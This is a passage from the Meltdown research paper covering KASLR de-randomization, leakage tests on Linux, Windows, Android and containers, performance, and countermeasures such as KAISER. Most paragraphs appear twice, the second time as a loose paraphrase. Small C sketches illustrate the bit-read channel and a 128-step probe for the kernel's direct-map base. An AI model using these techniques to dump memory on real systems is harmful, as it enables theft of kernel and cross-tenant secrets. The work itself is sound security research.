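        return reload_is_hit(&probe[1 * 4096]);  /* hit -> '1', miss -> '0' */
    }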
Transmitting only a single bit at once also has drawbacks. As described above, our side channel has a bias towards a secret value of '0'. If we read and transmit multiple bits at once, the likelihood that all bits are '0' may be quite small for actual user data. The likelihood that a single bit is '0' is typically close to 50%. Hence, the number of bits read and transmitted at once is a trade-off between some implicit error-reduction and the overall transmission rate of the covert channel.
Transmitting only one bit at a time also has disadvantages. As mentioned above, our side channel is biased towards "0" values. If we read multiple bits of secret data at a time and send them out, the chance that all bits are "0" is fairly small for actual user data, whereas the probability of a single bit being "0" is typically close to 50%. Therefore, the number of bits transmitted at once is a trade-off between the overall transmission rate of the covert channel and the reduction of errors.
However, since the error rates are quite small in either case, our evaluation (cf. Section 6) is based on the single-bit transmission mechanics.
However, since the error rate is quite small in either case, our evaluation (see Section 6) is based on the single-bit transmission mechanism.
Exception Suppression using Intel TSX.
This part concerns Intel TSX and is not translated in detail here; a minimal sketch of the idea was given in Section 4.1 above.
Dealing with KASLR.
In 2013, kernel address space layout randomization (KASLR) had been introduced to the Linux kernel (starting from version 3.14 [4]) allowing to randomize the location of the kernel code at boot time. However, only as recently as May 2017, KASLR had been enabled by default in version 4.12 [27]. With KASLR also the direct-physical map is randomized and, thus, not fixed at a certain address such that the attacker is required to obtain the randomized offset before mounting the Meltdown attack. However, the randomization is limited to 40 bit.
Dealing with KASLR.
In 2013, kernel address space layout randomization (KASLR) was incorporated into the Linux kernel (starting from version 3.14 [4]); this feature allows the kernel code to be loaded at a randomized address at boot time. Only recently (May 2017), in the 4.12 kernel, was KASLR enabled by default [27]. With KASLR, the address of the direct-physical map is also randomized rather than fixed, so before mounting the Meltdown attack against the kernel, the attacker needs to obtain the random offset. However, the randomization is limited to 40 bits.
Thus, if we assume a setup of the target machine with 8GB of RAM, it is sufficient to test the address space for addresses in 8GB steps. This allows covering the search space of 40 bit with only 128 tests in the worst case. If the attacker can successfully obtain a value from a tested address, the attacker can proceed to dump the entire memory from that location. This allows mounting Meltdown on a system protected by KASLR within seconds.
Suppose the target machine has 8GB of memory; we can then probe the address space with a step size of 8GB. Even in the worst case, only 128 tests are needed to determine the 40-bit random offset. Once the attacker successfully reads a value from a tested address, he can continue to dump the entire memory from that location. So although the system is protected by KASLR, an attacker exploiting the Meltdown vulnerability can still complete the attack within a few seconds.
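A sketch of this search (illustrative; leak_byte() stands for one complete Meltdown read of steps 1-3, returning -1 when no cache line hits):

    #include <stdint.h>

    #define GiB (1ULL << 30)

    /* Probe the 40-bit randomized direct-map base in 8 GiB steps:
       2^40 bytes / 8 GiB = 128 candidates in the worst case. */
    static uint64_t find_direct_map_base(int (*leak_byte)(uint64_t addr))
    {
        for (int i = 0; i < 128; i++) {
            uint64_t addr = 0xffff880000000000ULL + (uint64_t)i * 8 * GiB;
            if (leak_byte(addr) >= 0)  /* any successful read identifies the base */
                return addr;
        }
        return 0;  /* not found */
    }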

6. Evaluation

In this section, we evaluate Meltdown and the performance of our proof-of-concept implementation. Section 6.1 discusses the information which Meltdown can leak, and Section 6.2 evaluates the performance of Meltdown, including countermeasures. Finally, we discuss limitations for AMD and ARM in Section 6.4.
In this chapter, we will evaluate the impact of meltdown and the performance of our POC (proof-of-concept) implementation. Section 6.1 discusses the information that meltdown may leak, and Section 6.2 evaluates meltdown performance and countermeasures. Finally in Section 6.4 we discuss the limitations of meltdown on AMD and ARM processors.
(Table 1: Experimental setups.)
Table 1 shows a list of configurations on which we successfully reproduced Meltdown. For the evaluation of Meltdown, we used both laptops as well as desktop PCs with Intel Core CPUs. For the cloud setup, we tested Meltdown in virtual machines running on Intel Xeon CPUs hosted in the Amazon Elastic Compute Cloud as well as on DigitalOcean. Note that for ethical reasons we did not use Meltdown on addresses referring to physical memory of other tenants.
On the systems listed above, we have successfully exploited the Meltdown vulnerability. We evaluated Meltdown on laptops and desktops with Intel Core CPUs. For cloud servers, we tested virtual machines on Amazon Elastic Compute Cloud and DigitalOcean, whose CPUs are Intel Xeon processors. For ethical reasons, we did not use Meltdown to read data from physical memory belonging to other tenants.

6.1 Information Leakage in Different Environments

We evaluated Meltdown on both Linux (cf. Section 6.1.1) and Windows 10 (cf. Section 6.1.3). On both operating systems, Meltdown can successfully leak kernel memory. Furthermore, we also evaluated the effect of the KAISER patches on Meltdown on Linux, to show that KAISER prevents the leakage of kernel memory (cf. Section 6.1.2). Finally, we discuss the information leakage when running inside containers such as Docker (cf. Section 6.1.4).
We evaluated the Meltdown vulnerability on two operating systems, Linux (see Section 6.1.1) and Windows 10 (see Section 6.1.3), and showed that kernel memory can be successfully leaked on both. In addition, we also tested the effect of the KAISER patch on Linux; the results show that the KAISER patch prevents kernel memory leakage (see Section 6.1.2). Finally, we discuss information leakage in container environments such as Docker (see Section 6.1.4).

6.1.1 Linux

We successfully evaluated Meltdown on multiple versions of the Linux kernel, from 2.6.32 to 4.13.0. On all these versions of the Linux kernel, the kernel address space is also mapped into the user address space. Thus, all kernel addresses are also mapped into the address space of user space applications, but any access is prevented due to the permission settings for these addresses. As Meltdown bypasses these permission settings, an attacker can leak the complete kernel memory if the virtual address of the kernel base is known. Since all major operating systems also map the entire physical memory into the kernel address space (cf. Section 2.2), all physical memory can also be read.
We successfully evaluated Meltdown against several versions of the Linux kernel (from 2.6.32 to 4.13.0). In all these versions of the Linux kernel, the kernel address space is mapped into the user process address space. But any kernel data access from user space is blocked due to permission settings. Meltdown can bypass these permission settings, and as long as the attacker knows the kernel virtual address, he can launch an attack to leak kernel data. Since all major operating systems map the entire physical memory into the kernel address space (see Section 2.2), exploiting the meltdown vulnerability can read data from all physical memory.
Before kernel 4.12, kernel address space layout randomization (KASLR) was not active by default [30]. If KASLR is active, Meltdown can still be used to find the kernel by searching through the address space (cf. Section 5.2). An attacker can also simply de-randomize the direct-physical map by iterating through the virtual address space. Without KASLR, the direct-physical map starts at address 0xffff 8800 0000 0000 and linearly maps the entire physical memory. On such systems, an attacker can use Meltdown to dump the entire physical memory, simply by reading from virtual addresses starting at 0xffff 8800 0000 0000.
Before kernel 4.12, kernel address space layout randomization (KASLR) was not enabled by default [30]. If KASLR is enabled, Meltdown can still be used to find the kernel mapping by searching through the address space (see Section 5.2). An attacker can also simply de-randomize the direct-physical map by iterating through the virtual address space. Without KASLR, the Linux kernel maps the entire physical memory in the linear address region starting at 0xffff 8800 0000 0000. On such systems, an attacker can easily use Meltdown to dump the entire physical memory, because the attacker already knows that the virtual addresses of physical memory start at 0xffff 8800 0000 0000.
On newer systems, where KASLR is active by default, the randomization of the direct-physical map is limited to 40 bit. It is even further limited due to the linearity of the mapping. Assuming that the target system has at least 8GB of physical memory, the attacker can test addresses in steps of 8 GB, resulting in a maximum of 128 memory locations to test. Starting from one discovered location, the attacker can again dump the entire physical memory.
In newer Linux systems, KASLR is enabled by default, so the virtual address of the direct-physical map does not start at 0xffff 8800 0000 0000 but has a 40-bit random offset added. Since the mapping of physical memory is linear, the effect of KASLR in preventing Meltdown attacks is further limited. Assuming the target system has at least 8GB of memory, the attacker can search for the 40-bit random offset in steps of 8GB, recovering it in at most 128 attempts. Once the random offset is recovered, the attacker can again dump the entire physical memory.
Hence, for the evaluation, we can assume that the randomization is either disabled, or the offset was already retrieved in a pre-computation step.
Therefore, in the evaluation we assume that randomization is disabled, or that the offset has already been obtained in a pre-computation step.

6.1.2 Linux with KAISER Patch

The KAISER patch by Gruss et al. [8] implements a stronger isolation between kernel and user space.
KAISER does not map any kernel memory in the user space, except for some parts required by the x86 architecture (e.g., interrupt handlers). Thus, there is no valid mapping to either kernel memory or physical memory (via the direct-physical map) in the user space, and such addresses can therefore not be resolved. Consequently, Meltdown cannot leak any kernel or physical memory except for the few memory locations which have to be mapped in user space.
The KAISER patch by Gruss et al. [8] achieves stronger isolation between kernel and user space. KAISER does not map the kernel address space into the user process space at all, except for some parts required by the x86 architecture (such as interrupt handlers). Thus, in user space there is no valid mapping of kernel memory or of physical memory (via the direct-physical map), so such addresses cannot be resolved at all. Therefore, Meltdown cannot leak any kernel or physical memory except for the few memory locations that must be mapped in user space.
We verified that KAISER indeed prevents Meltdown, and there is no leakage of any kernel or physical memory.
Furthermore, if KASLR is active, and the few remaining memory locations are randomized, finding these memory locations is not trivial due to their small size of several kilobytes. Section 7.2 discusses the implications of these mapped memory locations from a security perspective.
In addition, with KASLR enabled, although a few kernel mappings remain visible to user mode, their locations are randomized, and since these memory regions are only a few KB in size, finding them is not a simple matter. Section 7.2 discusses the security implications of this small piece of mapped memory.

6.1.3 Microsoft Windows

We successfully evaluated Meltdown on a recent Microsoft Windows 10 operating system, last updated just before patches against Meltdown were rolled out. In line with the results on Linux (cf. Section 6.1.1), Meltdown also can leak arbitrary kernel memory on Windows. This is not surprising, since Meltdown does not exploit any software issues, but is caused by a hardware issue.
We successfully evaluated Meltdown on a recent Microsoft Windows 10 operating system, last updated just before the patches against Meltdown were rolled out. Consistent with the results on Linux (see Section 6.1.1), Meltdown can also leak arbitrary kernel memory on Windows. This is not surprising, since Meltdown does not exploit any software issue but is caused by a hardware issue.
In contrast to Linux, Windows does not have the concept of an identity mapping, which linearly maps the physical memory into the virtual address space. Instead, a large fraction of the physical memory is mapped in the paged pools, non-paged pools, and the system cache. Furthermore, Windows maps the kernel into the address space of every application too. Thus, Meltdown can read kernel memory which is mapped in the kernel address space, ie, any part of the kernel which is not swapped out, and any page mapped in the paged and non-paged pool, and the system cache.
Unlike Linux, Windows does not have the concept of an identity mapping that linearly maps physical memory into the virtual address space. Instead, a large portion of physical memory is mapped into the paged pool, the non-paged pool, and the system cache. Additionally, Windows also maps the kernel into each application's address space. Thus, Meltdown can read kernel memory mapped in the kernel address space, i.e., any part of the kernel that is not swapped out, any page mapped in the paged and non-paged pools, and the system cache.
Note that there are physical pages which are mapped in one process but not in the (kernel) address space of another process, i.e., physical pages which cannot be attacked using Meltdown. However, most of the physical memory will still be accessible through Meltdown.
Note that there are some physical pages that are mapped in one process but not in another process's (kernel) address space, i.e., physical pages that cannot be attacked using Meltdown. However, most physical memory is still accessible through Meltdown.
We were successfully able to read the binary of the Windows kernel using Meltdown. To verify that the leaked data is actual kernel memory, we first used the Windows kernel debugger to obtain kernel addresses containing actual data. After leaking the data, we again used the Windows kernel debugger to compare the leaked data with the actual memory content, confirming that Meltdown can successfully leak kernel memory.
We were able to successfully read Windows kernel binaries using Meltdown. To verify that the leaked data is actual kernel memory, we first use the Windows kernel debugger to obtain the kernel address containing the actual data. After leaking the data, we again used the Windows kernel debugger to compare the leaked data with the actual memory content, confirming that Meltdown can successfully leak kernel memory.

6.1.4 Android

We successfully evaluated Meltdown on a Samsung Galaxy S7 mobile phone running LineageOS Android 14.1 with a Linux kernel 3.18.14. The device is equipped with a Samsung Exynos 8 Octa 8890 SoC consisting of a ARM Cortex-A53 CPU with 4 cores as well as an Exynos M1 ”Mongoose” CPU with 4 cores [6]. While we were not able to mount the attack on the Cortex-A53 CPU, we successfully mounted Meltdown on Samsung’s custom cores. Using exception suppression described in Section 4.1, we successfully leaked a predefined string using the direct-physical map located at the virtual address 0xffff ffbf c000 0000.
We successfully evaluated Meltdown on a Samsung Galaxy S7 mobile phone running LineageOS Android 14.1 and Linux kernel 3.18.14. The device is equipped with a Samsung Exynos 8 Octa 8890 SoC consisting of an ARM Cortex-A53 CPU with 4 cores and an Exynos M1 "Mongoose" CPU with 4 cores [6]. Although we were unable to mount the attack on the Cortex-A53 CPU, we successfully mounted Meltdown on Samsung's custom cores. Using the exception suppression described in Section 4.1, we successfully leaked a predefined string via the direct-physical map located at virtual address 0xffff ffbf c000 0000.

6.1.5 Containers

We evaluated Meltdown running in containers sharing a kernel, including Docker, LXC, and OpenVZ, and found that the attack can be mounted without any restrictions. Running Meltdown inside a container allows to leak information not only from the underlying kernel, but also from all other containers running on the same physical host.
We evaluated meltdown in a container environment (sharing a kernel), including Docker, LXC, and OpenVZ, and found that meltdown can launch attacks without any restrictions. Running a meltdown attack in a container can not only leak the underlying kernel information, but also leak information on other containers on the same physical host.
The commonality of most container solutions is that every container uses the same kernel, i.e., the kernel is shared among all containers. Thus, every container has a valid mapping of the entire physical memory through the direct-physical map of the shared kernel. Furthermore, Meltdown cannot be blocked in containers, as it uses only memory accesses. Especially with Intel TSX, only unprivileged instructions are executed without even trapping into the kernel.
Most container solutions share the same kernel, that is, one kernel is shared among all containers. Therefore, each container has a valid mapping of the entire physical memory through the shared kernel's direct-physical map. Since Meltdown involves only memory accesses, it cannot be prevented inside containers. Especially when the Intel TSX feature is used, the attack executes only unprivileged instructions and never even traps into the kernel.
Thus, the isolation of containers sharing a kernel can be fully broken using Meltdown. This is especially critical for cheaper hosting providers where users are not separated through fully virtualized machines, but only through containers. We verified that our attack works in such a setup, by successfully leaking memory contents from a container of a different user under our control.
Therefore, the isolation between containers sharing a kernel can be completely broken by Meltdown. This is especially critical for cheaper hosting providers, where users are not isolated by fully virtualized machines but only by containers. We verified that Meltdown does work in such an environment: we successfully leaked memory contents from a container of a different user under our control.

6.1.6 Uncached and Uncacheable Memory

In this section, we evaluate whether it is a requirement for data to be leaked by Meltdown to reside in the L1 data cache [33]. Therefore, we constructed a setup with two processes pinned to different physical cores. By flushing the value, using the clflush instruction, and only reloading it on the other core, we create a situation where the target data is not in the L1 data cache of the attacker core. As described in Section 6.2, we can still leak the data at a lower reading rate. This clearly shows that data presence in the attacker’s L1 data cache is not a requirement for Meltdown. Furthermore, this observation has also been confirmed by other researchers [7, 35, 5].
In this section, we evaluate whether data leaked by Meltdown must reside in the L1 data cache [33]. To do so, we built a setup that pins two processes to different physical cores. By flushing the value with the clflush instruction and reloading it only on the other core, we create a situation in which the target data is not in the L1 data cache of the attacker's core. As described in Section 6.2, we can still leak the data at a lower reading rate. This clearly shows that the presence of the data in the attacker's L1 data cache is not a requirement for Meltdown. Furthermore, this observation has been confirmed by other researchers [7, 35, 5].
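A sketch of the setup's core pinning (Linux-specific, illustrative):

    #define _GNU_SOURCE
    #include <sched.h>

    /* Pin the calling process to one CPU so that attacker and victim run
       on different physical cores for the uncached-data experiment. */
    static int pin_to_cpu(int cpu)
    {
        cpu_set_t set;
        CPU_ZERO(&set);
        CPU_SET(cpu, &set);
        return sched_setaffinity(0, sizeof(set), &set);  /* 0 = this process */
    }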
The reason why Meltdown can leak uncached memory may be that Meltdown implicitly caches the data. We devise a second experiment, where we mark pages as uncacheable and try to leak data from them. This has the consequence that every read or write operation to one of those pages will directly go to the main memory, thus, bypassing the cache. In practice, only a negligible amount of system memory is marked uncacheable. We observed that if the attacker is able to trigger a legitimate load of the target address, e.g., by issuing a system call (regular or in speculative execution [40]), on the same CPU core as the Meltdown attack, the attacker can leak the content of the uncacheable pages. We suspect that Meltdown reads the value from the line fill buffers. As the fill buffers are shared between threads running on the same core, the read to the same address within the Meltdown attack could be served from one of the fill buffers allowing the attack to succeed. However, we leave further investigations on this matter open for future work.
The reason why Meltdown can leak uncached memory may be that Meltdown implicitly caches the data. We devised a second experiment in which we marked pages as uncacheable and tried to leak data from them. As a consequence, every read or write to one of those pages goes directly to main memory, bypassing the cache. In practice, only a negligible amount of system memory is marked uncacheable. We observed that an attacker can leak the contents of uncacheable pages if he can trigger a legitimate load of the target address, e.g., by issuing a system call (regular or in speculative execution [40]), on the same CPU core as the Meltdown attack. We suspect that Meltdown reads the value from the line fill buffers. As the fill buffers are shared between threads running on the same core, the read to the same address within the Meltdown attack could be served from one of the fill buffers, allowing the attack to succeed. However, we leave further investigation of this matter to future work.
A similar observation on uncacheable memory was also made with Spectre attacks on the System Management Mode [10]. While the attack works on memory set uncacheable over Memory-Type Range Registers, it does not work on memory-mapped I/O regions, which is the expected behavior as accesses to memory-mapped I/O can always have architectural effects.
A similar observation about uncacheable memory was also made with Spectre attacks on System Management Mode [10]. While the attack works on memory marked uncacheable via the Memory-Type Range Registers, it does not work on memory-mapped I/O regions; this is the expected behavior, because accesses to memory-mapped I/O always have architectural effects.

6.2 Meltdown Performance

To evaluate the performance of Meltdown, we leaked known values from kernel memory. This allows us to not only determine how fast an attacker can leak memory, but also the error rate, i.e., how many byte errors to expect. We achieved average reading rates of up to 503 KB/s with an error rate as low as 0.02% when using exception suppression. For the performance evaluation, we focused on the Intel Core i7-6700K as it supports Intel TSX, to get a fair performance comparison between exception handling and exception suppression.
In order to evaluate the performance of Meltdown, we placed known values in the kernel memory to be attacked in advance. This allows us to determine not only how fast the attacker can leak data from memory, but also the error rate (i.e., how many bytes are wrong). With exception suppression (which requires TSX support), we achieve a data leak rate of 503 KB/s with an error rate as low as 0.02%. For the performance evaluation, we focused on Intel's Core i7-6700K processor because it supports TSX; this way, we can fairly compare the performance of Meltdown with exception handling and with exception suppression on the same CPU.
For all tests, we use Flush+Reload as a covert channel to leak the memory as described in Section 5. We evaluated the performance of both exception handling and exception suppression (cf. Section 4.1). For exception handling, we used signal handlers, and if the CPU supported it, we also used exception suppression using Intel TSX. An extensive evaluation of exception suppression using conditional branches was done by Kocher et al. [19] and is thus omitted in this paper for the sake of brevity.
For all tests, we use Flush+Reload as the covert channel to leak memory information; see Chapter 5 for details. We evaluate the performance of Meltdown with both exception handling and exception suppression (see Section 4.1). For exception handling, we install a signal handler; if the CPU supports it, we can also use Intel TSX for exception suppression. An evaluation of exception suppression using conditional branches was done by Kocher et al. [19] and is omitted here for brevity.
(1) Exception handling
Exception handling is the more universal implementation, as it does not depend on any CPU extension and can thus be used without any restrictions. The only requirement for exception handling is operating system support to catch segmentation faults and continue operation afterwards. This is the case for all modern operating systems, even though the specific implementation differs between the operating systems. On Linux, we used signals, whereas, on Windows, we relied on the Structured Exception Handler.
The method of exception handling is more general, because it does not depend on any CPU extension feature and can thus be used on all processors without restriction. The only requirement is that the operating system supports catching a segmentation fault and continuing execution afterwards. Basically all modern operating systems support this, although the specific implementation varies. On Linux we use signals, while on Windows we rely on the Structured Exception Handler.
With exception handling, we achieved average reading speeds of 123 KB/s when leaking 12 MB of kernel memory. Out of the 12 MB of kernel data, only 0.03% were read incorrectly. Thus, with an error rate of 0.03%, the channel capacity is 122 KB/s.
With exception handling, we leaked 12 MB of kernel data at an average speed of 123 KB/s. Of the 12 MB of kernel data, the error rate was only 0.03%. The channel capacity is therefore 122 KB/s.
(2) Exception suppression
This is specific to Intel processors (TSX) and is omitted here.
(3) Meltdown in practice
This subsection of the paper shows several concrete Meltdown attack results and is omitted here.

6.3 Limitations on AMD and ARM Processors

We also tried to reproduce the Meltdown bug on several ARM and AMD CPUs. However, we did not manage to successfully leak kernel memory with the attack described in Section 5, neither on ARM nor on AMD. The reasons for this can be manifold. First of all, our implementation might simply be too slow and a more optimized version might succeed. For instance, a more shallow out-of-order execution pipeline could tip the race condition against the data leakage. Similarly, if the processor lacks certain features, e.g., no re-order buffer, our current implementation might not be able to leak data. However, for both ARM and AMD, the toy example as described in Section 3 works reliably, indicating that out-of-order execution generally occurs and instructions past illegal memory accesses are also performed.
We also attempted to reproduce the Meltdown vulnerability on several ARM and AMD CPUs. However, we have not successfully used the attack method described in Chapter 5 to steal kernel memory on either ARM or AMD processors. There are many possible reasons. First, our implementation might simply be too slow; a more optimized version might succeed. For example, a shallower out-of-order execution pipeline might tip the race condition against the data leakage. Similarly, if the processor lacks certain features, such as a re-order buffer, our current implementation may not be able to leak data. However, the simple example described in Chapter 3 still works reliably on ARM and AMD processors, suggesting that out-of-order execution does occur on those CPUs, i.e., instructions following an illegal memory access are also executed early.

7. Countermeasures

In this section, we discuss countermeasures against the Meltdown attack. At first, as the issue is rooted in the hardware itself, we want to discuss possible microcode updates and general changes in the hardware design. Second, we want to discuss the KAISER countermeasure that has been developed to mitigate side-channel attacks against KASLR which inadvertently also protects against Meltdown.
In this chapter, we discuss countermeasures against the Meltdown attack. Since the issue is rooted in the hardware itself, we first discuss possible microcode updates and general changes to the hardware design. Second, we discuss KAISER, a countermeasure developed to mitigate side-channel attacks against KASLR that inadvertently also protects against Meltdown.

7.1 Hardware strategies (Hardware)

Meltdown bypasses the hardware-enforced isolation of security domains. There is no software vulnerability involved in Meltdown. Hence any software patch (e.g., KAISER [8]) will leave small amounts of memory exposed (cf. Section 7.2). There is no documentation whether such a fix requires the development of completely new hardware, or can be fixed using a microcode update.
Meltdown does not involve any software vulnerability; it directly bypasses the hardware-enforced isolation mechanism. Therefore, any software patch (e.g., KAISER [8]) will still leave small amounts of memory exposed (see Section 7.2). Whether fixing Meltdown requires completely new hardware or can be done with a microcode update is not documented.
As Meltdown exploits out-of-order execution, a trivial countermeasure would be to completely disable out-of-order execution. However, the performance impacts would be devastating, as the parallelism of modern CPUs could not be leveraged anymore. Thus, this is not a viable solution.
Since Meltdown exploits out-of-order execution, a simple countermeasure would be to disable out-of-order execution entirely. However, the performance impact would be devastating, as we could no longer take advantage of the parallelism of modern CPUs. Therefore, this solution is not feasible.
Meltdown is some form of race condition between the fetch of a memory address and the corresponding permission check for this address. Serializing the permission check and the register fetch can prevent Meltdown, as the memory address is never fetched if the permission check fails. However, this involves a significant overhead to every memory fetch, as the memory fetch has to stall until the permission check is completed.
Meltdown is a race condition between fetching the data at a memory address and the permission check for that address. Strictly performing the permission check before fetching the data prevents Meltdown: if the check fails, the CPU never loads the protected data into a register. However, this adds significant overhead to every memory access, since each fetch must stall until the permission check completes.
A more realistic solution would be to introduce a hard split of user space and kernel space. This could be enabled optionally by modern kernels using a new hard split bit in a CPU control register, e.g., CR4. If the hard split bit is set, the kernel has to reside in the upper half of the address space, and the user space has to reside in the lower half of the address space. With this hard split, a memory fetch can immediately identify whether such a fetch of the destination would violate a security boundary, as the privilege level can be directly derived from the virtual address without any further lookups. We expect the performance impacts of such a solution to be minimal. Furthermore, the backwards compatibility is ensured, since the hard-split bit is not set by default and the kernel only sets it if it supports the hard-split feature.
A more realistic solution is to split user space and kernel space at the hardware level. This could be enabled by a bit (the hard-split bit) in a CPU control register (e.g., CR4). If this bit is set, the kernel must reside in the upper half of the address space and user space in the lower half. With this hardware mechanism, a privilege-violating memory fetch can be identified immediately, because the required privilege level can be derived directly from the virtual address without any further lookup. We believe this solution has minimal impact on performance. Backwards compatibility is also guaranteed, because the hard-split bit is not set by default, and the kernel sets it only if it supports the hard-split feature.
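As an illustration of this proposal (our sketch, not an existing CPU mechanism): with such a hard split, the privilege domain of a 64-bit virtual address follows from its top bit alone, so a user-mode fetch into the kernel half can be rejected before any data is read, without a page-table walk.

    #include <stdbool.h>
    #include <stdint.h>

    /* Upper half of the address space = kernel, per the hard split. */
    static inline bool is_kernel_half(uint64_t vaddr) {
        return (vaddr >> 63) & 1;
    }

    /* A fetch is allowed unless user-mode code targets the kernel half;
     * note that no page-table lookup is needed for this decision. */
    static inline bool fetch_allowed(uint64_t vaddr, bool user_mode) {
        return !(user_mode && is_kernel_half(vaddr));
    }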
Note that these countermeasures only prevent Meltdown, and not the class of Spectre attacks described by Kocher et al. [19]. Likewise, several countermeasures presented by Kocher et al. [19] have no effect on Meltdown. We stress that it is important to deploy countermeasures against both attacks.
Note that these countermeasures only prevent Meltdown and are ineffective against the Spectre attacks described by Kocher et al. [19]. Likewise, several countermeasures proposed by Kocher et al. [19] against Spectre have no effect on Meltdown. We emphasize again that it is important to deploy countermeasures against both attacks.

7.2 KAISER

As hardware is not as easy to patch, there is a need for software workarounds until new hardware can be deployed. Gruss et al. [8] proposed KAISER, a kernel modification to not have the kernel mapped in the user space. This modification was intended to prevent side-channel attacks breaking KASLR [13, 9, 17]. However, it also prevents Meltdown, as it ensures that there is no valid mapping to kernel space or physical memory available in user space. KAISER will be available in the upcoming releases of the Linux kernel under the name kernel page-table isolation (KPTI) [25]. The patch will also be backported to older Linux kernel versions. A similar patch was also introduced in Microsoft Windows 10 Build 17035 [15]. Also, Mac OS X and iOS have similar features [22].
Hardware cannot be patched quickly, so software workarounds are needed until new hardware can be deployed. Gruss et al. [8] proposed KAISER, a kernel modification that leaves no kernel mappings visible in a user process's address space. The patch was intended to prevent side-channel attacks that break KASLR [13, 9, 17]. However, because it ensures that no valid mapping of kernel space or physical memory is available in user space, KAISER also prevents Meltdown. KAISER will appear in upcoming Linux kernel releases under the name kernel page-table isolation (KPTI) [25], and the patch will also be backported to older kernel versions. A similar patch was provided for Microsoft Windows 10 (Build 17035) [15]. Mac OS X and iOS also have similar features [22].
Although KAISER provides basic protection against Meltdown, it still has some limitations. Due to the design of the x86 architecture, several privileged memory locations are required to be mapped in user space [8]. This leaves a residual attack surface for Meltdown, i.e., these memory locations can still be read from user space. Even though these memory locations do not contain any secrets, such as credentials, they might still contain pointers. Leaking one pointer can be enough to again break KASLR, as the randomization can be calculated from the pointer value.
Although KAISER provides basic protection against Meltdown, it still has limitations. Due to the design of the x86 architecture, a few privileged memory locations must remain mapped in user space [8], so they can still be read from user space; this leaves a residual attack surface for Meltdown. Even though these locations contain no confidential data, they may still contain pointers, and leaking a single pointer can be enough to break KASLR, because the randomized offset can be derived from the pointer's value.
Still, KAISER is the best short-term solution currently available and should therefore be deployed on all systems immediately. Even with Meltdown, KAISER can avoid having any kernel pointers on memory locations that are mapped in the user space which would leak information about the randomized offsets. This would require trampoline locations for every kernel pointer, i.e., the interrupt handler would not call into kernel code directly, but through a trampoline function. The trampoline function must only be mapped in the kernel. It must be randomized with a different offset than the remaining kernel. Consequently, an attacker can only leak pointers to the trampoline code, but not the randomized offsets of the remaining kernel. Such trampoline code is required for every kernel memory region that still has to be mapped in user space and contains kernel addresses. This approach is a trade-off between performance and security which has to be assessed in future work.
Still, KAISER is the best short-term solution currently available and should be deployed on all systems immediately. Even with Meltdown present, KAISER avoids keeping any kernel pointers in memory locations that are mapped into user space, which would otherwise leak the randomized offsets. This requires a trampoline for every such kernel pointer: for example, the interrupt handler would not call into kernel code directly, but through a trampoline function. The trampoline function is mapped only in kernel space and is randomized with a different offset than the rest of the kernel. Consequently, an attacker can only leak pointers to the trampoline code, not the randomized offsets of the remaining kernel. Such trampoline code is required for every kernel memory region that still has to be mapped in user space and contains kernel addresses. This approach is a trade-off between performance and security that has to be assessed in future work.
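The trampoline idea can be pictured with a small user-space analogy (purely illustrative; real interrupt entry is kernel assembly): only the trampoline's address is ever exposed to user-mapped memory, and since the trampoline region is randomized independently, leaking that address reveals nothing about the offset of the kernel proper.

    #include <stdio.h>

    /* Kernel proper: randomized with offset A, never exposed. */
    static void real_interrupt_handler(void) {
        puts("handled in the hidden part of the kernel");
    }

    /* Trampoline: randomized with a different offset B; this is the
     * only symbol whose address may appear in user-mapped memory. */
    static void trampoline(void) {
        real_interrupt_handler();
    }

    int main(void) {
        /* An attacker leaking this pointer learns offset B only,
         * not offset A of the remaining kernel. */
        void (*entry)(void) = trampoline;
        entry();
        return 0;
    }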

8. Discussion

Meltdown fundamentally changes our perspective on the security of hardware optimizations that manipulate the state of microarchitectural elements. The fact that hardware optimizations can change the state of microarchitectural elements, and thereby imperil secure software implementations, has been known for more than 20 years [20]. Both industry and the scientific community so far accepted this as a necessary evil for efficient computing. Today it is considered a bug when a cryptographic algorithm is not protected against the microarchitectural leakage introduced by the hardware optimizations. Meltdown changes the situation entirely. Meltdown shifts the granularity from a comparably low spatial and temporal granularity, e.g., 64 bytes every few hundred cycles for cache attacks, to an arbitrary granularity, allowing an attacker to read every single bit. This is nothing any (cryptographic) algorithm can protect itself against. KAISER is a short-term software fix, but the problem we uncovered is much more significant.
By manipulating the microarchitectural state, CPU designers can optimize hardware performance, but the security problems this introduces have not received enough attention; Meltdown changes that fundamentally. For more than 20 years, it has been known that hardware optimizations can change the microarchitectural state and thereby put secure software implementations at risk [20]. So far, both industry and academia have accepted this as a necessary evil of efficient computing. Today, a cryptographic algorithm that is not protected against microarchitectural leakage (introduced by hardware optimizations) is considered buggy. Meltdown completely changes the status quo. Earlier attacks had comparatively coarse spatial and temporal granularity, e.g., cache attacks observe 64 bytes every few hundred cycles; with Meltdown, the granularity becomes arbitrary, allowing an attacker to read every single bit, which no (cryptographic) algorithm can protect against. KAISER is a short-term software fix, but the problem we uncover is much more fundamental (i.e., security cannot be sacrificed for performance).
We expect several more performance optimizations in modern CPUs which affect the microarchitectural state in some way, not even necessarily through the cache. Thus, hardware which is designed to provide certain security guarantees, e.g., CPUs running untrusted code, requires a redesign to avoid Meltdown- and Spectre-like attacks. Meltdown also shows that even error-free software, which is explicitly written to thwart side-channel attacks, is not secure if the design of the underlying hardware is not taken into account.
We expect more performance optimizations to appear in modern CPUs, and these optimizations may affect the microarchitectural state in some way (not necessarily the cache, but other microarchitectural units as well). Therefore, hardware that is designed to provide certain security guarantees, such as CPUs running untrusted code, needs to be redesigned to avoid Meltdown- and Spectre-like attacks. Meltdown also shows that even bug-free software, carefully written to avoid side-channel attacks, is insecure if the security of the underlying hardware is not carefully considered.
With the integration of KAISER into all major operating systems, an important step has already been done to prevent Meltdown. KAISER is also the first step of a paradigm change in operating systems. Instead of always mapping everything into the address space, mapping only the minimally required memory locations appears to be a first step in reducing the attack surface. However, it might not be enough, and an even stronger isolation may be required. In this case, we can trade flexibility for performance and security, by e.g., forcing a certain virtual memory layout for every operating system. As most modern operating systems already use basically the same memory layout, this might be a promising approach.
With KAISER integrated into all mainstream operating systems, an important step has been taken toward preventing Meltdown. KAISER also marks a change in how operating systems design address mappings. Previously, all addresses (kernel and user) were always mapped into the entire process address space; now, only the minimally required address space is mapped while executing in user mode, which reduces the attack surface. However, this may not be enough, and even stronger isolation may be required. In that case, we can trade flexibility for performance and security, for example by forcing every operating system to use a specific virtual memory layout. Since most modern operating systems already use essentially the same memory layout, this could be a promising approach.
